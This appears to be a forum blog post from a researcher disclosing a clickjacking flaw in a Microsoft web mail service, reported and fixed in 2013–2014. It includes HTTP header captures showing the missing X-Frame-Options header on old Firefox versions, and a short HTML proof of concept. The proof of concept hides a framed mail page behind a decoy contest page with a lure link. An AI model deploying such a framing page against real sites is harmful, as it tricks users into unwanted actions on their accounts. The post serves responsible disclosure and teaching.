View RSS Feed


UI redress attack on (affected all pages).

Rating: 7 votes, 3.86 average.
Quote Originally Posted by [s] View Post
On 7/29/13 I've reported XFO vulnerability to the Microsoft Security team and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs and this vulnerability seems to be more interesting to share on the Garage4Hackers.

The timeline of investigation of the bug : July 29, 2013 - April 16 , 2014.

Name:  msresponse.jpg
Views: 8011
Size:  23.1 KB

The interesting part of the vulnerability all pages were protected for UI Addressing Attack and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly.

Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis By David Rude II aka Bannedit
Note : Have look the same vulnerability on Facebook Application Installing

Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with G4H team , I've concluded, it may be issue with Gecko Engine. The test environment was win 7 , ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread.

Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.


        GET /m/?bfv=wm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm;; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie:; path=/
        Set-Cookie: xidseq=7;; path=/
        Set-Cookie: LD=;; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1
Here is some print screen of basic operations of (I would like to remind you , every page of was vulnerable )

Attacker developed this page to attack on victim.

Composing Email :

Uploading Attachment :

Deleting Emails :


HTML POC , which i used sent to MS Security Team

<!-- This Quick Developed POC , for testing purpose --!>
<!-- Visit  --!>
	<title> Live Mail Send Clickjacking - </title>
		iframe { 
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>

    <iframe src=""></iframe>
	<a href="" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

Let me know if you have any question about this bug

- [S]
Tags: None Add / Edit Tags



Total Trackbacks 0
Trackback URL: